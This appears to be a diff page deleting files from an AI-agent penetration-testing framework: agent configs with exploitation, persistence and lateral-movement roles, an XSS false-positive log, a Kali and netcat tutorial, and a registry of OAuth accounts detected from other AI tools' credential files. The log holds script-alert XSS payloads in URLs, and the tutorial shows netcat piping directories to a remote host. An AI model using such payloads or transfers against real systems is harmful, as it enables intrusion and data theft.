at ASP.comments_aspx.ProcessRequest(HttpContext context) in c:\Windows\Microsoft.NET\Framework64\v2.0.50727\Temporary ASP.NET Files\root\e6eb278b\4a52d72d\App_Web_pebpzm2g.0.cs:line 0
at System.Web.HttpApplication.CallHandlerExecutionStep.System.Web.HttpApplication.IExecutionStep.Execute()
at System.Web.HttpApplication.ExecuteStep(IExecutionStep step, Boolean& completedSynchronously)
--><!--
This error page might contain sensitive information because ASP.NET is configured to show verbose error messages using &lt;customErrors mode="Off"/&gt;. Consider using &lt;customErrors mode="On"/&gt; or &lt;customErrors mode="RemoteOnly"/&gt; in production environments.-->
View File
View File
-116
View File
File diff suppressed because one or more lines are too long
-50
View File
@@ -1,50 +0,0 @@
{
"llm": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "",
"temperature": 0.7,
"max_tokens": 4096
},
"agents": {
"recon": {
"enabled": true,
"priority": 1
},
"exploitation": {
"enabled": true,
"priority": 2
},
"privilege_escalation": {
"enabled": true,
"priority": 3
},
"persistence": {
"enabled": true,
"priority": 4
},
"lateral_movement": {
"enabled": true,
"priority": 5
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-114
View File
@@ -1,114 +0,0 @@
{
"llm": {
"default_profile": "gemini_pro_default",
"profiles": {
"gemini_pro_default": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "${GEMINI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 30720,
"output_token_limit": 2048,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
}
}
},
"agent_roles": {
"pentest_generalist": {
"enabled": true,
"tools_allowed": [
"nmap",
"metasploit",
"burpsuite",
"sqlmap",
"hydra"
],
"description": "Performs comprehensive penetration tests across various domains.",
"methodology": ["OWASP-WSTG", "PTES", "OWASP-Top10-2021"],
"default_prompt": "auto_pentest",
"vuln_coverage": 100,
"ai_prompts": true
},
"bug_bounty_hunter": {
"enabled": true,
"tools_allowed": [
"subfinder",
"nuclei",
"burpsuite",
"sqlmap"
],
"description": "Focuses on web application vulnerabilities with 100 vuln types.",
"methodology": ["OWASP-WSTG", "OWASP-Top10-2021"],
"default_prompt": "auto_pentest",
"vuln_coverage": 100,
"ai_prompts": true
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"mcp_servers": {
"neurosploit_tools": {
"transport": "stdio",
"command": "python3",
"args": ["-m", "core.mcp_server"],
"description": "NeuroSploit pentest tools: screenshots, payload delivery, DNS, port scan, tech detect, subdomain enum, findings, AI prompts, Nuclei scanner, Naabu port scanner, sandbox execution"
}
},
"sandbox": {
"enabled": false,
"mode": "per_scan",
"image": "neurosploit-sandbox:latest",
"container_name": "neurosploit-sandbox",
"auto_start": false,
"kali": {
"enabled": true,
"image": "neurosploit-kali:latest",
"max_concurrent": 5,
"container_ttl_minutes": 60,
"auto_cleanup_orphans": true
},
"resources": {
"memory_limit": "2g",
"cpu_limit": 2.0
},
"tools": [
"nuclei", "naabu", "nmap", "httpx", "subfinder", "katana",
"dnsx", "ffuf", "gobuster", "dalfox", "nikto", "sqlmap",
"whatweb", "curl", "dig", "whois", "masscan", "dirsearch",
"wfuzz", "arjun", "wafw00f", "waybackurls"
],
"nuclei": {
"rate_limit": 150,
"timeout": 600,
"severity_filter": "critical,high,medium",
"auto_update_templates": true
},
"naabu": {
"rate": 1000,
"top_ports": 1000,
"timeout": 300
}
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-154
View File
@@ -1,154 +0,0 @@
{
"llm": {
"default_profile": "gemini_pro_default",
"profiles": {
"ollama_llama3_default": {
"provider": "ollama",
"model": "llama3:8b",
"api_key": "",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 8000,
"output_token_limit": 4000,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": false,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": null
},
"gemini_pro_default": {
"provider": "gemini",
"model": "gemini-pro",
"api_key": "${GEMINI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 30720,
"output_token_limit": 2048,
"cache_enabled": true,
"search_context_level": "medium",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
},
"claude_opus_default": {
"provider": "claude",
"model": "claude-opus-4-6-20250918",
"api_key": "${ANTHROPIC_API_KEY}",
"temperature": 0.7,
"max_tokens": 16384,
"input_token_limit": 1000000,
"output_token_limit": 16384,
"cache_enabled": true,
"search_context_level": "high",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "self_reflection"
},
"gpt_4o_default": {
"provider": "gpt",
"model": "gpt-4o",
"api_key": "${OPENAI_API_KEY}",
"temperature": 0.7,
"max_tokens": 4096,
"input_token_limit": 128000,
"output_token_limit": 4096,
"cache_enabled": true,
"search_context_level": "high",
"pdf_support_enabled": true,
"guardrails_enabled": true,
"hallucination_mitigation_strategy": "consistency_check"
}
}
},
"agent_roles": {
"bug_bounty_hunter": {
"enabled": true,
"tools_allowed": [
"subfinder",
"nuclei",
"burpsuite",
"sqlmap"
],
"description": "Focuses on web application vulnerabilities, leveraging recon and exploitation tools."
},
"blue_team_agent": {
"enabled": true,
"tools_allowed": [],
"description": "Analyzes logs and telemetry for threats, provides defensive strategies."
},
"exploit_expert": {
"enabled": true,
"tools_allowed": [
"metasploit",
"nmap"
],
"description": "Devises exploitation strategies and payloads for identified vulnerabilities."
},
"red_team_agent": {
"enabled": true,
"tools_allowed": [
"nmap",
"metasploit",
"hydra"
],
"description": "Plans and executes simulated attacks to test an organization's defenses."
},
"replay_attack_specialist": {
"enabled": true,
"tools_allowed": [
"burpsuite"
],
"description": "Identifies and leverages replay attack vectors in network traffic or authentication."
},
"pentest_generalist": {
"enabled": true,
"tools_allowed": [
"nmap",
"subfinder",
"nuclei",
"metasploit",
"burpsuite",
"sqlmap",
"hydra"
],
"description": "Performs comprehensive penetration tests across various domains."
},
"owasp_expert": {
"enabled": true,
"tools_allowed": [
"burpsuite",
"sqlmap"
],
"description": "Specializes in assessing web applications against OWASP Top 10 vulnerabilities."
},
"cwe_expert": {
"enabled": true,
"tools_allowed": [],
"description": "Analyzes code and reports for weaknesses based on MITRE CWE Top 25."
},
"malware_analyst": {
"enabled": true,
"tools_allowed": [],
"description": "Examines malware samples to understand functionality and identify IOCs."
}
},
"methodologies": {
"owasp_top10": true,
"cwe_top25": true,
"network_pentest": true,
"ad_pentest": true,
"web_security": true
},
"tools": {
"nmap": "/usr/bin/nmap",
"metasploit": "/usr/bin/msfconsole",
"burpsuite": "/usr/bin/burpsuite",
"sqlmap": "/usr/bin/sqlmap",
"hydra": "/usr/bin/hydra"
},
"output": {
"format": "json",
"verbose": true,
"save_artifacts": true
}
}
-4
View File
@@ -1,4 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
-4
View File
@@ -1,4 +0,0 @@
# Netscape HTTP Cookie File
# https://curl.se/docs/http-cookies.html
# This file was generated by libcurl! Edit at your own risk.
-63
View File
@@ -1,63 +0,0 @@
{
"feedback": [
{
"vuln_id": "1b79cb50-2f1e-4ab2-a8bc-3de7b95f2fbc",
"vuln_type": "unknown",
"endpoint_pattern": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"param": "file",
"payload_pattern": "",
"is_true_positive": false,
"explanation": "nao disparou alerta de XSS e parece ser mais um possivel Path Transversal aqui",
"severity": "medium",
"domain": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"timestamp": "2026-02-16T20:41:38.817732"
},
{
"vuln_id": "836fd546-ee28-4869-a9fe-1c2cd37a3f41",
"vuln_type": "unknown",
"endpoint_pattern": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"param": "pp",
"payload_pattern": "",
"is_true_positive": false,
"explanation": "Parece ser mais DOM XSS",
"severity": "medium",
"domain": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"timestamp": "2026-02-16T20:42:01.342162"
}
],
"patterns": {
"unknown": [
{
"endpoint_pattern": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"vuln_type": "unknown",
"indicators": [
"file"
],
"is_false_positive": true,
"confidence": 0.5,
"feedback_count": 1,
"domain": "http://testphp.vulnweb.com/showimage.php?file=1&file=%3Cscript%3Ealert('XSS')%3C/script%3E",
"explanation_summary": "nao disparou alerta de XSS e parece ser mais um possivel Path Transversal aqui",
"last_updated": "2026-02-16T20:41:38.817738"
},
{
"endpoint_pattern": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"vuln_type": "unknown",
"indicators": [
"pp"
],
"is_false_positive": true,
"confidence": 0.5,
"feedback_count": 1,
"domain": "http://testphp.vulnweb.com/hpp/?pp=12&pp=%3Cscript%3Ealert('XSS')%3C/script%3E",
"explanation_summary": "Parece ser mais DOM XSS",
"last_updated": "2026-02-16T20:42:01.342167"
}
]
},
"metadata": {
"total_feedback": 2,
"total_patterns": 2,
"last_updated": "2026-02-16T20:42:01.342235"
}
}
-22
View File
@@ -1,22 +0,0 @@
{
"documents": [
{
"id": "1c4cf70f-d4a",
"filename": "pentest.md",
"title": "Kali Linux Penetration Testing Fundamentals and Essential Tools",
"source_type": "md",
"uploaded_at": "2026-02-16T14:50:31.618020",
"processed": true,
"file_size_bytes": 20702,
"summary": "This document provides an introduction to Kali Linux as a penetration testing platform and covers fundamental Linux concepts. It discusses the differences between vulnerability assessments and penetration tests, emphasizes legal considerations including written authorization requirements, and introduces netcat as an essential networking tool for security testing.",
"vuln_types": [],
"knowledge_entries": []
}
],
"vuln_type_index": {
"information_disclosure": [],
"clickjacking": []
},
"version": "1.0",
"updated_at": "2026-04-28T19:00:40.997968"
}
@@ -1,344 +0,0 @@
----------
Chapter 1: Introduction
========
About Kali Linux
------------------------
> [Kali Linux](https://www.kali.org/) is a Debian-based Linux distribution aimed at advanced Penetration Testing and Security Auditing. Kali contains several hundred tools which are geared towards various information security tasks, such as Penetration Testing, Security research, Computer Forensics and Reverse Engineering. Kali Linux is developed, funded and maintained by [Offensive Security](http://www.offensive-security.com/), a leading information security training company.
Kali Linux was released on the 13th March, 2013 as a complete, top-to-bottom rebuild of [BackTrack Linux](http://www.backtrack-linux.org/), adhering completely to Debian development standards.
Linux Basics
---------------
You should aware of some basics of Linux commands which will be used and come in handy and will be lot helpful. Here only basics are covered and more detail can be found at this [link](https://www.digitalocean.com/community/tutorials/an-introduction-to-linux-i-o-redirection)
**Streams**
Input and output in the Linux environment is distributed across three streams. These streams are:
standard input (stdin) # typically carries data from a user to a program
standard output (stdout) # writes the data that is generated by a program
standard error (stderr) # writes the errors generated by a program that has failed at some point in its execution
The streams are also numbered:
stdin (0) # cat
stdout (1) # echo
stderr (2)
**Stream Redirection**
Linux includes redirection commands for each stream. These commands write standard output to a file. If a non-existent file is targetted (either by a single-bracket or double-bracket command), a new file with that name will be created prior to writing.
Commands with a single bracket overwrite the destination's existing contents.
Overwrite
> - standard output
< - standard input
2> - standard error
Commands with a double bracket do not overwrite the destination's existing contents.
Append
>> - standard output
<< - standard input
2>> - standard error
**Pipes**
Pipes (vertical bar `*|*`) are used to redirect a stream from one program to another. When a program's standard output is sent to another through a pipe, the first program's data, which is received by the second program, will not be displayed on the terminal. Only the filtered data returned by the second program will be displayed.
**Filters**
Filters are commands that alter piped redirection and output.
>filter commands are also standard Linux commands that can be used without pipes.
* `find` - returns files with filenames that match the argument passed to find.
* `grep` - returns text that matches the string pattern passed to grep.
* `tee` - redirects standard input to both standard output and one or more files. (typically used to view a program's output while simultaneously saving it to a file.)
* `tr` - finds-and-replaces one string with another.
* `wc` - counts characters, lines, and words.
About Penetration Testing
----------------------------------
**vulnerability assessment :** simply identifies and reports noted vulnerabilities
**penetration test(Pen Test)** attempts to exploit the vulnerabilities to determine whether unauthorized access or other malicious activity is possible. Penetration testing typically includes network penetration testing and application security testing as well as controls and processes around the networks and applications, and should occur from both outside the network trying to come in (external testing) and from inside the network.
an authorised simulated attack on a computer system, performed to evaluate the security of the system. The test is performed to identify both weaknesses (also referred to as vulnerabilities), including the potential for unauthorized parties to gain access to the system's features and data,as well as strengths, enabling a full risk assessment to be completed.
***Penetration testing tools*** are used as part of a penetration test(Pen Test) to automate certain tasks, improve testing efficiency and discover issues that might be difficult to find using manual analysis techniques alone. Two common penetration testing tools are static analysis tools and dynamic analysis tools.
Legal
------
> As one might expect, there are a wealth of legal issues that are associated with information security. Whether its a matter of preventing security breaches in order to maintain the security of your client information (or that of your organization), or simply realizing exactly how far ones obligations go when it comes to information security, its important to realize exactly what your obligations are as far as the legal world goes with information security.
Because technology is ever-changing, there are always questions about what the legal protections might be when it comes to the misuse of new technology, or even what sort of jurisdiction might govern your organization or its clients. One of the biggest problems with computer crime is that laws still arent clear as to who polices what online, if anything. As a result, companies must protect themselves against an attack on their internal servers and other information that might be at risk.
**Major Issues**
- One of the biggest issues that organizations will face as far as maintaining your information security goes is that technology is developing so quickly that it is hard for the legal system to keep up. Even if you have taken the time to amass evidence against those who may have breached your information security system, there are no guarantees that this evidence will even be admissible in a court of law.
- Penetration testing may affect system performance, and can raise confidentiality and integrity issues; therefore, this is very important, even in an internal penetration testing, which is performed by an internal staff to get permission in writing. There should be a written agreement between a tester and the company/organization/individual to clarify all the points regarding the data security, disclosure, etc. before commencing testing.
> One consideration that pen testers should be aware of is the laws surrounding the practice of port scanning.
You need to consider exactly how tightly your pen test will need to scan the systems that you are authorized to scan. Also, ensure you have permission to conduct the scan with a legitimate reason to do so; it is far easier to ask permission in this case than to beg forgiveness.
----------
Chapter 2: The Essential Tools
========
Netcat
--------
> This simple utility reads and writes data across TCP or UDP network connections. It is designed to be a reliable back-end tool to use directly or easily drive by other programs and scripts. At the same time, it is a feature-rich network debugging and exploration tool, since it can create almost any kind of connection you would need, including port binding to accept incoming connections.
Official website: http://nc110.sourceforge.net/
### Features
The original netcat's features include:
* Outbound or inbound connections, TCP or UDP, to or from any ports
* Full DNS forward/reverse checking, with appropriate warnings
* Ability to use any local source port
* Ability to use any locally configured network source address
* Built-in port-scanning capabilities, with randomization
* Built-in loose source-routing capability
* Can read command line arguments from standard input
* Slow-send mode, one line every N seconds
* Hex dump of transmitted and received data
* Optional ability to let another program service establish connections
* Optional telnet-options responder
* Featured tunneling mode which permits user-defined tunneling, e.g., UDP or TCP, with the possibility of specifying all network parameters (source port/interface, listening port/interface, and the remote host allowed to connect to the tunnel).
#### The Basics
The most basic syntax is:
$ netcat [options] host port
This will attempt to initiate a TCP to the defined host on the port number specified. This is basically functions similarly to the old Linux telnet command. Keep in mind that your connection is entirely unencrypted.
If you would like to send a UDP packet instead of initiating a TCP connection, you can use the -u option:
$ netcat -u host port
You can specify a range of ports by placing a dash between the first and last:
$ netcat host startport-endport
### Netcat for Port Scanning
the most common uses for netcat is as a port scanner.
$ netcat -z -v domain.com 1-10000
`-z` - to perform a scan instead of attempting to initiate a connection
`-v` - provide more verbose information.
`1-10000` - scan all ports up to 10000 by issuing this command
Output:
nc: connect to domain.com port 1 (tcp) failed: Connection refused
nc: connect to domain.com port 2 (tcp) failed: Connection refused
nc: connect to domain.com port 3 (tcp) failed: Connection refused
nc: connect to domain.com port 4 (tcp) failed: Connection refused
nc: connect to domain.com port 5 (tcp) failed: Connection refused
nc: connect to domain.com port 6 (tcp) failed: Connection refused
nc: connect to domain.com port 7 (tcp) failed: Connection refused
. . .
Connection to domain.com 22 port [tcp/ssh] succeeded!
. . .
Connection to domain.com 8000 port [tcp/*] succeeded!
> scan will go much faster if you know the IP address that you need. You can then use the `-n` flag to specify that you do not need to resolve the IP address using DNS
Another example:
Checking whether UDP ports (-u) 27010-27015 are open on 209.58.178.32 using zero mode I/O (-z)
$ nc -vzu 209.58.178.32 27010-27015
Connection to 209.58.178.32 27015 port [udp/*] succeeded!
\* for education purpose only I have use ip of open server for the game counter strike
### Communicate through Netcat
Netcat can listen on a port for connections and packets. This gives us the opportunity to connect two instances of netcat in a client-server relationship.
On one machine, you can tell netcat to listen to a specific port for connections. We can do this by providing the `-l` parameter and choosing a port:
$ netcat -l 4444
As a regular (non-root) user, you will not be able to open any ports under 1000, as a security measure.
On another machine we'll connect to the first machine on the port number we choose
$ netcat domain.com 4444
### File Transfer with NetCat
Because we are establishing a regular TCP connection, we can transmit just about any kind of information over that connection. It is not limited to chat messages that are typed in by a user. We can use this knowledge to turn netcat into a file transfer program.
again, we need to choose one end of the connection to listen for connections. However, instead of printing information onto the screen, we will place all of the information straight into a file.
$ netcat -l 4444 > received_file
On other machine transfer the file as:
netcat domain.com 4444 < original_file
For instance, we can transfer the contents of an entire directory by creating an unnamed tarball on-the-fly, transferring it to the remote system, and unpacking it into the remote directory.
On the receiving end, we can anticipate a file coming over that will need to be unzipped and extracted by typing:
$ netcat -l 4444 | tar xzvf -
the ending dash (`-`) means that tar will operate on standard input, which is being piped from netcat across the network when a connection is made.
On the side with the directory contents we want to transfer, we can pack them into a tarball and then send them to the remote computer through netcat:
$ tar -czf - * | netcat domain.com 4444
This time, the dash (`-`) in the tar command means to tar and zip the contents of the current directory (as specified by the `*` wildcard), and write the result to standard output.
> use the `dd` command to image a disk on one side and transfer it to a remote computer.
### Netcat as a Simple Web Server
create a HTML `index.html` file and serve it to desire port address (as previously you can not host to port below 1000 as non root user)
printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888
This will serve the page, and then the netcat connection will close. If you attempt to refresh the page, it will be gone
We can have netcat serve the page indefinitely by wrapping the last command in an infinite loop, as:
while true; do printf 'HTTP/1.1 200 OK\n\n%s' "$(cat index.html)" | netcat -l 8888; done
----------
***Ncat***
Ncat is a feature-packed networking utility which reads and writes data across networks from the command line. Ncat was written for the Nmap Project as a much-improved reimplementation of the venerable Netcat. It uses both TCP and UDP for communication and is designed to be a reliable back-end tool to instantly provide network connectivity to other applications and users. Ncat will not only work with IPv4 and IPv6 but provides the user with a virtually limitless number of potential uses.
Among Ncats vast number of features there is the ability to chain Ncats together, redirect both TCP and UDP ports to other sites, SSL support, and proxy connections via SOCKS4 or HTTP (CONNECT method) proxies (with optional proxy authentication as well). Some general principles apply to most applications and thus give you the capability of instantly adding networking support to software that would normally never support it.
----------
Wireshark
-------------
> Official document: https://www.wireshark.org/docs/wsug_html_chunked/
> Other helpful link(s):
> https://www.howtogeek.com/104278/how-to-use-wireshark-to-capture-filter-and-inspect-packets/
Wireshark is a network packet analyzer. A network packet analyzer will try to capture network packets and tries to display that packet data as detailed as possible.
Wireshark is a free application that allows you to capture and view the data traveling back and forth on your network, providing the ability to drill down and read the contents of each packet filtered to meet your specific needs. It is commonly utilized to troubleshoot network problems as well as to develop and test software. This open-source protocol analyzer is widely accepted as the industry standard, winning its fair share of awards over the years.
## Why use Wireshark?
- Network administrators use it to troubleshoot network problems
- Network security engineers use it to examine security problems
- QA engineers use it to verify network applications
- Developers use it to debug protocol implementations
- People use it to learn network protocol internals
### Features
- _Capture_ live packet data from a network interface.
- _Open_ files containing packet data captured with tcpdump/WinDump, Wireshark, and a number of other packet capture programs.
- _Import_ packets from text files containing hex dumps of packet data.
- Display packets with _very detailed protocol information_.
- _Filter packets_ on many criteria.
: i.e. IPv4 address, IPv6 address, ethernet address, port, tcp, udp etc.
- _Search_ for packets on many criteria.
- Create various _statistics_.
## Making Sense of Network Dumps
## Capture and Display Filters
Some of the filters are as below:
filter packets if ipv4 address is equal to 54.36.48.153 (using `eq` or `==`)
ip.addr eq 54.36.48.153
you can use multiple expression with `and` or `&&`
ip.addr eq 54.36.48.153 and tcp.stream eq 6
get conversation with specific ip and port
(ip.addr eq 54.36.48.153 and ip.addr eq 200.200.200.9) and (tcp.port eq 8000 and tcp.port eq 34018)
Look at below filter options in wireshark, here various available filter with example expression and as per requirement we can combine various filter with various Boolean operators
![wireshark filters](https://i.imgur.com/Hms4ccu.png)
## Following TCP Streams
A good [link](https://www.youtube.com/watch?time_continue=4&v=xPgCZwj446o) to learn in detail how to follow tcp stream:
![TCP stream Index](https://i.imgur.com/smfXY16.png)
----------
Tcpdump
-----------
Official [site](https://www.tcpdump.org/tcpdump_man.html)
other references:
https://linux.die.net/man/8/tcpdump
https://danielmiessler.com/study/tcpdump/
> Tcpdump is the premier network analysis tool for information security professionals.
When using a tool that displays network traffic a more natural (raw) way the burden of analysis is placed directly on the human rather than the application. This approach cultivates continued and elevated understanding of the TCP/IP suite
### Options
- **`-i any`** : Listen on all interfaces just to see if youre seeing any traffic.
- **`-i eth0`** : Listen on the eth0 interface.
- **`-D`** : Show the list of available interfaces
- **`-n`** : Dont resolve hostnames.
- **`-nn`** : Dont resolve hostnames _or_ port names.
- **`-q`** : Be less verbose (more quiet) with your output.
- **`-t`** : Give human-readable timestamp output.
- **`-tttt`** : Give maximally human-readable timestamp output.
- **`-X`** : Show the packets _contents_ in both [hex](https://en.wikipedia.org/wiki/Hexidecimal) and [ascii](https://en.wikipedia.org/wiki/Ascii).
- **`-XX`** : Same as **`-X`**, but also shows the ethernet header.
- **`-v, -vv, -vvv`** : Increase the amount of packet information you get back.
- **`-c`** : Only get _x_ number of packets and then stop.
- **`-s`** : Define the _snaplength_ (size) of the capture in bytes. Use `-s0` to get everything, unless you are intentionally capturing less.
- **`-S`** : Print absolute sequence numbers.
- **`-e`** : Get the ethernet header as well.
- **`-q`** : Show less protocol information.
- **`-E`** : Decrypt IPSEC traffic by providing an encryption key.
### Expressions
In `tcpdump`, _Expressions_ allow you to trim out various types of traffic and find exactly what youre looking for. Mastering the expressions and learning to combine them creatively is what makes one truly powerful with `tcpdump`.
There are three main types of expression: `type`, `dir`, and `proto`.
- Type options are: `host`, `net`, and `port`.
- Direction lets you do `src`, `dst`, and combinations thereof.
- Proto(col) lets you designate: `tcp`, `udp`, `icmp`, `ah`, and many more.
## Filtering Traffic
**Filtering hosts:**
| | |
|--|--|
| Match any traffic involving 192.168.1.1 as destination or source | `$ tcpdump -i eth1 host 192.168.1.1` |
| As source only | `$ tcpdump -i eth1 src host 192.168.1.1` |
| As destination only | `$ tcpdump -i eth1 dst host 192.168.1.1` |
**Filtering ports :**
| | |
|--|--|
| Match any traffic involving port 25 as source or destination | `$ tcpdump -i eth1 port 25` |
| As source only | `$ tcpdump -i eth1 src port 25` |
| As destination only | `$ tcpdump -i eth1 dst port 25` |
**Network filtering :**
$ tcpdump -i eth1 net 192.168
$ tcpdump -i eth1 src net 192.168
$ tcpdump -i eth1 dst net 192.168
**Protocol filtering :**
$ tcpdump -i eth1 arp
$ tcpdump -i eth1 ip
$ tcpdump -i eth1 tcp
$ tcpdump -i eth1 udp
$ tcpdump -i eth1 icmp
***Combine expressions :***
*Negation* : `!` or `not` (without the quotes)
*Concatanate* : `&&` or `and`
*Alternate* : `||` or `or`
- This rule will match any TCP traffic on port `80` (web) with `192.168.1.254` or `192.168.1.200` as destination host
`$ tcpdump -i eth1 '((tcp) and (port 80) and ((dst host 192.168.1.254) or (dst host 192.168.1.200)))'`
- Will match any ICMP traffic involving the destination with physical/MAC address `00:01:02:03:04:05`
`$ tcpdump -i eth1 '((icmp) and ((ether dst host 00:01:02:03:04:05)))'`
- Will match any traffic for the destination network `192.168` except destination host `192.168.1.200`
`$ tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host 192.168.1.200)))'`
## Advanced Header Filtering
> Helpful [link](https://www.wains.be/pub/networking/tcpdump_advanced_filters.txt)
| | |
|--|--|
| `proto[x:y]` | will start filtering from byte `x` for `y` bytes. `ip[2:2]` would filter bytes `3` and `4` (first byte begins by 0) |
| `proto[x:y] & z = 0` | will *match* bits set to `0` when applying `mask z` to `proto[x:y]`
| `proto[x:y] & z !=0` | some bits are *set* when applying `mask z` to `proto[x:y]`
| `proto[x:y] & z = z` | *every* bits are *set* to `z` when applying `mask z` to `proto[x:y]`
| `proto[x:y] = z` | `p[x:y]` has exactly the bits set to `z`
**IP header**
![IP header](https://i.imgur.com/rD6BF52.jpg)
-269
View File
@@ -1,269 +0,0 @@
{
"claude_code": {
"id": "claude_code",
"name": "Claude Code",
"auth_type": "oauth",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {
"acct_36f54de8": {
"id": "acct_36f54de8",
"label": "Claude Code (credentials file)",
"source": "cli_detect",
"credential_type": "oauth",
"created_at": "2026-02-16T18:46:19Z",
"last_used": null,
"tokens_used": 0,
"is_active": true,
"expires_at": 1771822745.308,
"model_override": null
}
},
"env_key": null,
"enabled": true
},
"codex_cli": {
"id": "codex_cli",
"name": "OpenAI Codex CLI",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.openai.com/v1",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": null,
"enabled": true
},
"gemini_cli": {
"id": "gemini_cli",
"name": "Gemini CLI",
"auth_type": "oauth",
"api_format": "gemini_code_assist",
"base_url": "https://cloudcode-pa.googleapis.com",
"tier": 1,
"default_model": "gemini-2.5-flash",
"accounts": {
"acct_ad76c781": {
"id": "acct_ad76c781",
"label": "Gemini CLI",
"source": "cli_detect",
"credential_type": "oauth",
"created_at": "2026-02-16T18:45:22Z",
"last_used": "2026-02-18T14:59:29Z",
"tokens_used": 5009,
"is_active": true,
"expires_at": 1771461656.003,
"model_override": null
}
},
"env_key": null,
"enabled": true
},
"cursor": {
"id": "cursor",
"name": "Cursor",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api2.cursor.sh/v1",
"tier": 1,
"default_model": "cursor-fast",
"accounts": {},
"env_key": null,
"enabled": true
},
"copilot": {
"id": "copilot",
"name": "GitHub Copilot",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.githubcopilot.com",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": null,
"enabled": true
},
"iflow": {
"id": "iflow",
"name": "iFlow AI",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://api.iflow.ai/v1",
"tier": 1,
"default_model": "kimi-k2",
"accounts": {},
"env_key": null,
"enabled": true
},
"qwen_code": {
"id": "qwen_code",
"name": "Qwen Code",
"auth_type": "oauth",
"api_format": "openai_compat",
"base_url": "https://chat.qwen.ai/api/v1",
"tier": 1,
"default_model": "qwen3-coder",
"accounts": {},
"env_key": null,
"enabled": true
},
"kiro": {
"id": "kiro",
"name": "Kiro AI",
"auth_type": "oauth",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {},
"env_key": null,
"enabled": true
},
"anthropic": {
"id": "anthropic",
"name": "Anthropic",
"auth_type": "api_key",
"api_format": "anthropic",
"base_url": "https://api.anthropic.com",
"tier": 1,
"default_model": "claude-sonnet-4-5-20250929",
"accounts": {
"acct_eaabc038": {
"id": "acct_eaabc038",
"label": "Anthropic (env)",
"source": "env_var",
"credential_type": "api_key",
"created_at": "2026-02-16T13:46:47Z",
"last_used": "2026-02-16T19:05:03Z",
"tokens_used": 114420,
"is_active": true,
"expires_at": null,
"model_override": null
}
},
"env_key": "ANTHROPIC_API_KEY",
"enabled": true
},
"openai": {
"id": "openai",
"name": "OpenAI",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.openai.com/v1",
"tier": 1,
"default_model": "gpt-4o",
"accounts": {},
"env_key": "OPENAI_API_KEY",
"enabled": true
},
"gemini": {
"id": "gemini",
"name": "Gemini",
"auth_type": "api_key",
"api_format": "gemini",
"base_url": "https://generativelanguage.googleapis.com/v1beta",
"tier": 1,
"default_model": "gemini-2.5-flash",
"accounts": {},
"env_key": "GEMINI_API_KEY",
"enabled": true
},
"openrouter": {
"id": "openrouter",
"name": "OpenRouter",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://openrouter.ai/api/v1",
"tier": 1,
"default_model": "anthropic/claude-sonnet-4-5",
"accounts": {},
"env_key": "OPENROUTER_API_KEY",
"enabled": true
},
"glm": {
"id": "glm",
"name": "GLM (Zhipu AI)",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://open.bigmodel.cn/api/paas/v4",
"tier": 2,
"default_model": "glm-4-flash",
"accounts": {},
"env_key": "GLM_API_KEY",
"enabled": true
},
"kimi": {
"id": "kimi",
"name": "Kimi (Moonshot)",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.moonshot.cn/v1",
"tier": 2,
"default_model": "moonshot-v1-8k",
"accounts": {},
"env_key": "KIMI_API_KEY",
"enabled": true
},
"minimax": {
"id": "minimax",
"name": "Minimax",
"auth_type": "api_key",
"api_format": "openai_compat",
"base_url": "https://api.minimax.chat/v1",
"tier": 2,
